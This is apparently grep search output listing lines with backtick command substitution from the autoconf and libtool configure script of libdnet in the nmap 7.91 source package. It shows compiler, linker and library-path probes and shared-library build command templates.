nmap-7.91+dfsg1/libdnet-stripped/configure:2983:case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/libdnet-stripped/configure-2984-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2993-else
nmap-7.91+dfsg1/libdnet-stripped/configure:2994:  ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` ||
nmap-7.91+dfsg1/libdnet-stripped/configure-2995-    as_fn_error $? "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-3015-IFS=$ac_save_IFS
nmap-7.91+dfsg1/libdnet-stripped/configure:3016:case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/libdnet-stripped/configure-3017-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-3373-$as_echo_n "checking whether the C compiler works... " >&6; }
nmap-7.91+dfsg1/libdnet-stripped/configure:3374:ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'`
nmap-7.91+dfsg1/libdnet-stripped/configure-3375-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-3417-	then :; else
nmap-7.91+dfsg1/libdnet-stripped/configure:3418:	   ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-3419-	fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-3477-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;;
nmap-7.91+dfsg1/libdnet-stripped/configure:3478:    *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-3479-	  break;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-3586-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;;
nmap-7.91+dfsg1/libdnet-stripped/configure:3587:    *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-3588-       break;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-3839-# case it prints its new name instead of `make'.
nmap-7.91+dfsg1/libdnet-stripped/configure:3840:if test "`$am_make -s -f confmf 2> /dev/null | grep -v 'ing directory'`" = "done"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-3841-   am__include=include
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-3847-   echo '.include "confinc"' > confmf
nmap-7.91+dfsg1/libdnet-stripped/configure:3848:   if test "`$am_make -s -f confmf 2> /dev/null`" = "done"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-3849-      am__include=.include
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-3906-  if test "$am_compiler_list" = ""; then
nmap-7.91+dfsg1/libdnet-stripped/configure:3907:     am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp`
nmap-7.91+dfsg1/libdnet-stripped/configure-3908-  fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4072-  # Check for GNU $ac_path_SED
nmap-7.91+dfsg1/libdnet-stripped/configure:4073:case `"$ac_path_SED" --version 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/configure-4074-*GNU*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4148-  # Check for GNU $ac_path_GREP
nmap-7.91+dfsg1/libdnet-stripped/configure:4149:case `"$ac_path_GREP" --version 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/configure-4150-*GNU*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4214-  # Check for GNU $ac_path_EGREP
nmap-7.91+dfsg1/libdnet-stripped/configure:4215:case `"$ac_path_EGREP" --version 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/configure-4216-*GNU*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4281-  # Check for GNU $ac_path_FGREP
nmap-7.91+dfsg1/libdnet-stripped/configure:4282:case `"$ac_path_FGREP" --version 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/configure-4283-*GNU*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4361-    # gcc leaves a trailing carriage return which upsets mingw
nmap-7.91+dfsg1/libdnet-stripped/configure:4362:    ac_prog=`($CC -print-prog-name=ld) 2>&5 | tr -d '\015'` ;;
nmap-7.91+dfsg1/libdnet-stripped/configure-4363-  *)
nmap-7.91+dfsg1/libdnet-stripped/configure:4364:    ac_prog=`($CC -print-prog-name=ld) 2>&5` ;;
nmap-7.91+dfsg1/libdnet-stripped/configure-4365-  esac
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4370-      # Canonicalize the pathname of ld
nmap-7.91+dfsg1/libdnet-stripped/configure:4371:      ac_prog=`$ECHO "$ac_prog"| $SED 's%\\\\%/%g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-4372-      while $ECHO "$ac_prog" | $GREP "$re_direlt" > /dev/null 2>&1; do
nmap-7.91+dfsg1/libdnet-stripped/configure:4373:	ac_prog=`$ECHO $ac_prog| $SED "s%$re_direlt%/%"`
nmap-7.91+dfsg1/libdnet-stripped/configure-4374-      done
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4405-      # Break only if it was the GNU/non-GNU ld that we prefer.
nmap-7.91+dfsg1/libdnet-stripped/configure:4406:      case `"$lt_cv_path_LD" -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libdnet-stripped/configure-4407-      *GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4436-  # I'd rather use --version here, but apparently some GNU lds only accept -v.
nmap-7.91+dfsg1/libdnet-stripped/configure:4437:case `$LD -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libdnet-stripped/configure-4438-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4481-	# Tru64's nm complains that /dev/null is an invalid object file
nmap-7.91+dfsg1/libdnet-stripped/configure:4482:	case `"$tmp_nm" -B /dev/null 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libdnet-stripped/configure-4483-	*/dev/null* | *'Invalid file or object type'*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4487-	*)
nmap-7.91+dfsg1/libdnet-stripped/configure:4488:	  case `"$tmp_nm" -p /dev/null 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libdnet-stripped/configure-4489-	  */dev/null*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4710-    # And add a safety zone
nmap-7.91+dfsg1/libdnet-stripped/configure:4711:    lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4`
nmap-7.91+dfsg1/libdnet-stripped/configure:4712:    lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3`
nmap-7.91+dfsg1/libdnet-stripped/configure-4713-    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4738-    if test -n "$kargmax"; then
nmap-7.91+dfsg1/libdnet-stripped/configure:4739:      lt_cv_sys_max_cmd_len=`echo $kargmax | sed 's/.*[	 ]//'`
nmap-7.91+dfsg1/libdnet-stripped/configure-4740-    else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4746-    if test -n "$lt_cv_sys_max_cmd_len"; then
nmap-7.91+dfsg1/libdnet-stripped/configure:4747:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4`
nmap-7.91+dfsg1/libdnet-stripped/configure:4748:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3`
nmap-7.91+dfsg1/libdnet-stripped/configure-4749-    else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4758-      # we can't tell.
nmap-7.91+dfsg1/libdnet-stripped/configure:4759:      while { test "X"`$SHELL $0 --fallback-echo "X$teststring$teststring" 2>/dev/null` \
nmap-7.91+dfsg1/libdnet-stripped/configure-4760-	         = "XX$teststring$teststring"; } >/dev/null 2>&1 &&
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4762-      do
nmap-7.91+dfsg1/libdnet-stripped/configure:4763:        i=`expr $i + 1`
nmap-7.91+dfsg1/libdnet-stripped/configure-4764-        teststring=$teststring$teststring
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4766-      # Only check the string length outside the loop.
nmap-7.91+dfsg1/libdnet-stripped/configure:4767:      lt_cv_sys_max_cmd_len=`expr "X$teststring" : ".*" 2>&1`
nmap-7.91+dfsg1/libdnet-stripped/configure-4768-      teststring=
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-4771-      # linker.  It appears as though 1/2 is a usable value.
nmap-7.91+dfsg1/libdnet-stripped/configure:4772:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 2`
nmap-7.91+dfsg1/libdnet-stripped/configure-4773-    fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-5126-openbsd*)
nmap-7.91+dfsg1/libdnet-stripped/configure:5127:  if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`" || test "$host_os-$host_cpu" = "openbsd2.8-powerpc"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-5128-    lt_cv_deplibs_check_method='match_pattern /lib[^/]+(\.so\.[0-9]+\.[0-9]+|\.so|_pic\.a)$'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-5615-# If we're using GNU nm, then use its standard symbol codes.
nmap-7.91+dfsg1/libdnet-stripped/configure:5616:case `$NM -V 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/configure-5617-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-5633-mingw*)
nmap-7.91+dfsg1/libdnet-stripped/configure:5634:  opt_cr=`$ECHO 'x\{0,1\}' | tr x '\015'` # option cr in regexp
nmap-7.91+dfsg1/libdnet-stripped/configure-5635-  ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-5830-  test $ac_status = 0; }; then
nmap-7.91+dfsg1/libdnet-stripped/configure:5831:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libdnet-stripped/configure-5832-      *ELF-32*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-5850-    if test "$lt_cv_prog_gnu_ld" = yes; then
nmap-7.91+dfsg1/libdnet-stripped/configure:5851:      case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libdnet-stripped/configure-5852-	*32-bit*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-5862-    else
nmap-7.91+dfsg1/libdnet-stripped/configure:5863:      case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libdnet-stripped/configure-5864-	*32-bit*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-6844-do :
nmap-7.91+dfsg1/libdnet-stripped/configure:6845:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libdnet-stripped/configure-6846-ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-6849-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libdnet-stripped/configure:6850:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libdnet-stripped/configure-6851-_ACEOF
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-7111-done
nmap-7.91+dfsg1/libdnet-stripped/configure:7112:cc_basename=`$ECHO "X$cc_temp" | $Xsed -e 's%.*/%%' -e "s%^$host_alias-%%"`
nmap-7.91+dfsg1/libdnet-stripped/configure-7113-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-7140-	"file_magic "*)
nmap-7.91+dfsg1/libdnet-stripped/configure:7141:	  file_magic_regex=`expr "$deplibs_check_method" : "file_magic \(.*\)"`
nmap-7.91+dfsg1/libdnet-stripped/configure-7142-	  MAGIC_CMD="$lt_cv_path_MAGIC_CMD"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-7206-	"file_magic "*)
nmap-7.91+dfsg1/libdnet-stripped/configure:7207:	  file_magic_regex=`expr "$deplibs_check_method" : "file_magic \(.*\)"`
nmap-7.91+dfsg1/libdnet-stripped/configure-7208-	  MAGIC_CMD="$lt_cv_path_MAGIC_CMD"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-7545-      *)
nmap-7.91+dfsg1/libdnet-stripped/configure:7546:	case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libdnet-stripped/configure-7547-	*Sun\ C*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-7881-  if test "$hard_links" = no; then
nmap-7.91+dfsg1/libdnet-stripped/configure:7882:    { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: \`$CC' does not support \`-c -o', so \`make -j' may be unsafe" >&5
nmap-7.91+dfsg1/libdnet-stripped/configure:7883:$as_echo "$as_me: WARNING: \`$CC' does not support \`-c -o', so \`make -j' may be unsafe" >&2;}
nmap-7.91+dfsg1/libdnet-stripped/configure-7884-    need_locks=warn
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-7974-    supports_anon_versioning=no
nmap-7.91+dfsg1/libdnet-stripped/configure:7975:    case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/configure-7976-      *\ [01].* | *\ 2.[0-9].* | *\ 2.10.*) ;; # catch versions < 2.11
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8039-	# is EXPORTS), use it as is; otherwise, prepend...
nmap-7.91+dfsg1/libdnet-stripped/configure:8040:	archive_expsym_cmds='if test "x`$SED 1q $export_symbols`" = xEXPORTS; then
nmap-7.91+dfsg1/libdnet-stripped/configure-8041-	  cp $export_symbols $output_objdir/$soname.def;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8062-      # time.  Moving up from 0x10000000 also allows more sbrk(2) space.
nmap-7.91+dfsg1/libdnet-stripped/configure:8063:      archive_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags ${wl}-h,$soname ${wl}--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure:8064:      archive_expsym_cmds='sed "s,^,_," $export_symbols >$output_objdir/$soname.expsym~$CC -shared $pic_flag $libobjs $deplibs $compiler_flags ${wl}-h,$soname ${wl}--retain-symbols-file,$output_objdir/$soname.expsym ${wl}--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure-8065-      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8080-        pgcc*)				# Portland Group C compiler
nmap-7.91+dfsg1/libdnet-stripped/configure:8081:	  whole_archive_flag_spec='${wl}--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; $ECHO \"$new_convenience\"` ${wl}--no-whole-archive'
nmap-7.91+dfsg1/libdnet-stripped/configure-8082-	  tmp_addflag=' $pic_flag'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8084-	pgf77* | pgf90* | pgf95*)	# Portland Group f77 and f90 compilers
nmap-7.91+dfsg1/libdnet-stripped/configure:8085:	  whole_archive_flag_spec='${wl}--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; $ECHO \"$new_convenience\"` ${wl}--no-whole-archive'
nmap-7.91+dfsg1/libdnet-stripped/configure-8086-	  tmp_addflag=' $pic_flag -Mnomain' ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8099-	esac
nmap-7.91+dfsg1/libdnet-stripped/configure:8100:	case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libdnet-stripped/configure-8101-	*Sun\ C*)			# Sun C 5.9
nmap-7.91+dfsg1/libdnet-stripped/configure:8102:	  whole_archive_flag_spec='${wl}--whole-archive`new_convenience=; for conv in $convenience\"\"; do test -z \"$conv\" || new_convenience=\"$new_convenience,$conv\"; done; $ECHO \"$new_convenience\"` ${wl}--no-whole-archive'
nmap-7.91+dfsg1/libdnet-stripped/configure-8103-	  compiler_needs_object=yes
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8168-    sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX*)
nmap-7.91+dfsg1/libdnet-stripped/configure:8169:      case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/configure-8170-        *\ [01].* | *\ 2.[0-9].* | *\ 2.1[0-5].*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8289-	# below for broken collect2 doesn't work under 4.3+
nmap-7.91+dfsg1/libdnet-stripped/configure:8290:	  collect2name=`${CC} -print-prog-name=collect2`
nmap-7.91+dfsg1/libdnet-stripped/configure-8291-	  if test -f "$collect2name" &&
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8356-    }'
nmap-7.91+dfsg1/libdnet-stripped/configure:8357:aix_libpath=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libdnet-stripped/configure-8358-# Check for a 64-bit object if we didn't find anything.
nmap-7.91+dfsg1/libdnet-stripped/configure-8359-if test -z "$aix_libpath"; then
nmap-7.91+dfsg1/libdnet-stripped/configure:8360:  aix_libpath=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libdnet-stripped/configure-8361-fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8367-        hardcode_libdir_flag_spec='${wl}-blibpath:$libdir:'"$aix_libpath"
nmap-7.91+dfsg1/libdnet-stripped/configure:8368:        archive_expsym_cmds='$CC -o $output_objdir/$soname $libobjs $deplibs '"\${wl}$no_entry_flag"' $compiler_flags `if test "x${allow_undefined_flag}" != "x"; then $ECHO "X${wl}${allow_undefined_flag}" | $Xsed; else :; fi` '"\${wl}$exp_sym_flag:\$export_symbols $shared_flag"
nmap-7.91+dfsg1/libdnet-stripped/configure-8369-      else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8396-    }'
nmap-7.91+dfsg1/libdnet-stripped/configure:8397:aix_libpath=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libdnet-stripped/configure-8398-# Check for a 64-bit object if we didn't find anything.
nmap-7.91+dfsg1/libdnet-stripped/configure-8399-if test -z "$aix_libpath"; then
nmap-7.91+dfsg1/libdnet-stripped/configure:8400:  aix_libpath=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libdnet-stripped/configure-8401-fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8451-      # FIXME: Setting linknames here is a bad hack.
nmap-7.91+dfsg1/libdnet-stripped/configure:8452:      archive_cmds='$CC -o $lib $libobjs $compiler_flags `$ECHO "X$deplibs" | $Xsed -e '\''s/ -lc$//'\''` -link -dll~linknames='
nmap-7.91+dfsg1/libdnet-stripped/configure-8453-      # The linker will automatically build a .lib file if we build a DLL.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8456-      old_archive_cmds='lib -OUT:$oldlib$oldobjs$old_deplibs'
nmap-7.91+dfsg1/libdnet-stripped/configure:8457:      fix_srcfile_path='`cygpath -w "$srcfile"`'
nmap-7.91+dfsg1/libdnet-stripped/configure-8458-      enable_shared_with_static_runtimes=yes
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8609-      if test "$GCC" = yes; then
nmap-7.91+dfsg1/libdnet-stripped/configure:8610:	archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure-8611-	# Try to use the -exported_symbol ld option, if it does not
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8620-if ac_fn_c_try_link "$LINENO"; then :
nmap-7.91+dfsg1/libdnet-stripped/configure:8621:  archive_expsym_cmds='$CC -shared $libobjs $deplibs $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations ${wl}-exports_file ${wl}$export_symbols -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure-8622-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8627-      else
nmap-7.91+dfsg1/libdnet-stripped/configure:8628:	archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure:8629:	archive_expsym_cmds='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -exports_file $export_symbols -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure-8630-      fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8664-	hardcode_direct_absolute=yes
nmap-7.91+dfsg1/libdnet-stripped/configure:8665:	if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`" || test "$host_os-$host_cpu" = "openbsd2.8-powerpc"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-8666-	  archive_cmds='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8697-	allow_undefined_flag=' ${wl}-expect_unresolved ${wl}\*'
nmap-7.91+dfsg1/libdnet-stripped/configure:8698:	archive_cmds='$CC -shared${allow_undefined_flag} $libobjs $deplibs $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure-8699-      else
nmap-7.91+dfsg1/libdnet-stripped/configure-8700-	allow_undefined_flag=' -expect_unresolved \*'
nmap-7.91+dfsg1/libdnet-stripped/configure:8701:	archive_cmds='$CC -shared${allow_undefined_flag} $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure-8702-      fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8710-	allow_undefined_flag=' ${wl}-expect_unresolved ${wl}\*'
nmap-7.91+dfsg1/libdnet-stripped/configure:8711:	archive_cmds='$CC -shared${allow_undefined_flag} $libobjs $deplibs $compiler_flags ${wl}-msym ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure-8712-	hardcode_libdir_flag_spec='${wl}-rpath ${wl}$libdir'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8714-	allow_undefined_flag=' -expect_unresolved \*'
nmap-7.91+dfsg1/libdnet-stripped/configure:8715:	archive_cmds='$CC -shared${allow_undefined_flag} $libobjs $deplibs $compiler_flags -msym -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/configure:8716:	archive_expsym_cmds='for i in `cat $export_symbols`; do printf "%s %s\\n" -exported_symbol "\$i" >> $lib.exp; done; printf "%s\\n" "-hidden">> $lib.exp~
nmap-7.91+dfsg1/libdnet-stripped/configure:8717:	$CC -shared${allow_undefined_flag} ${wl}-input ${wl}$lib.exp $compiler_flags $libobjs $deplibs -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib~$RM $lib.exp'
nmap-7.91+dfsg1/libdnet-stripped/configure-8718-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-8733-      else
nmap-7.91+dfsg1/libdnet-stripped/configure:8734:	case `$CC -V 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/configure-8735-	*"Compilers 5.0"*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9127-  esac
nmap-7.91+dfsg1/libdnet-stripped/configure:9128:  lt_search_path_spec=`$CC -print-search-dirs | awk $lt_awk_arg | $SED -e "s/^libraries://" -e "s,=/,/,g"`
nmap-7.91+dfsg1/libdnet-stripped/configure-9129-  if $ECHO "$lt_search_path_spec" | $GREP ';' >/dev/null ; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9133-    # okay in the real world where ";" in dirpaths is itself problematic.
nmap-7.91+dfsg1/libdnet-stripped/configure:9134:    lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED -e 's/;/ /g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-9135-  else
nmap-7.91+dfsg1/libdnet-stripped/configure:9136:    lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED  -e "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libdnet-stripped/configure-9137-  fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9140-  lt_tmp_lt_search_path_spec=
nmap-7.91+dfsg1/libdnet-stripped/configure:9141:  lt_multi_os_dir=`$CC $CPPFLAGS $CFLAGS $LDFLAGS -print-multi-os-directory 2>/dev/null`
nmap-7.91+dfsg1/libdnet-stripped/configure-9142-  for lt_sys_path in $lt_search_path_spec; do
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9169-}'`
nmap-7.91+dfsg1/libdnet-stripped/configure:9170:  sys_lib_search_path_spec=`$ECHO $lt_search_path_spec`
nmap-7.91+dfsg1/libdnet-stripped/configure-9171-else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9257-    # Create ${libname}_ixlibrary.a entries in /sys/libs.
nmap-7.91+dfsg1/libdnet-stripped/configure:9258:    finish_eval='for lib in `ls $libdir/*.ixlibrary 2>/dev/null`; do libname=`$ECHO "X$lib" | $Xsed -e '\''s%^.*/\([^/]*\)\.ixlibrary$%\1%'\''`; test $RM /sys/libs/${libname}_ixlibrary.a; $show "cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a"; cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a || exit 1; done'
nmap-7.91+dfsg1/libdnet-stripped/configure-9259-    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9292-    # DLL is installed to $(libdir)/../bin by postinstall_cmds
nmap-7.91+dfsg1/libdnet-stripped/configure:9293:    postinstall_cmds='base_file=`basename \${file}`~
nmap-7.91+dfsg1/libdnet-stripped/configure:9294:      dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\${base_file}'\''i; echo \$dlname'\''`~
nmap-7.91+dfsg1/libdnet-stripped/configure:9295:      dldir=$destdir/`dirname \$dlpath`~
nmap-7.91+dfsg1/libdnet-stripped/configure-9296-      test -d \$dldir || mkdir -p \$dldir~
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9301-      fi'
nmap-7.91+dfsg1/libdnet-stripped/configure:9302:    postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~
nmap-7.91+dfsg1/libdnet-stripped/configure-9303-      dlpath=$dir/\$dldll~
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9309-      # Cygwin DLLs use 'cyg' prefix rather than 'lib'
nmap-7.91+dfsg1/libdnet-stripped/configure:9310:      soname_spec='`echo ${libname} | sed -e 's/^lib/cyg/'``echo ${release} | $SED -e 's/[.]/-/g'`${versuffix}${shared_ext}'
nmap-7.91+dfsg1/libdnet-stripped/configure-9311-      sys_lib_search_path_spec="/usr/lib /lib/w32api /lib /usr/local/lib"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9314-      # MinGW DLLs use traditional 'lib' prefix
nmap-7.91+dfsg1/libdnet-stripped/configure:9315:      soname_spec='${libname}`echo ${release} | $SED -e 's/[.]/-/g'`${versuffix}${shared_ext}'
nmap-7.91+dfsg1/libdnet-stripped/configure:9316:      sys_lib_search_path_spec=`$CC -print-search-dirs | $GREP "^libraries:" | $SED -e "s/^libraries://" -e "s,=/,/,g"`
nmap-7.91+dfsg1/libdnet-stripped/configure-9317-      if $ECHO "$sys_lib_search_path_spec" | $GREP ';[c-zC-Z]:/' >/dev/null; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9323-        # which wouldn't understand a cygwinified path. Ahh.
nmap-7.91+dfsg1/libdnet-stripped/configure:9324:        sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e 's/;/ /g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-9325-      else
nmap-7.91+dfsg1/libdnet-stripped/configure:9326:        sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED  -e "s/$PATH_SEPARATOR/ /g"`
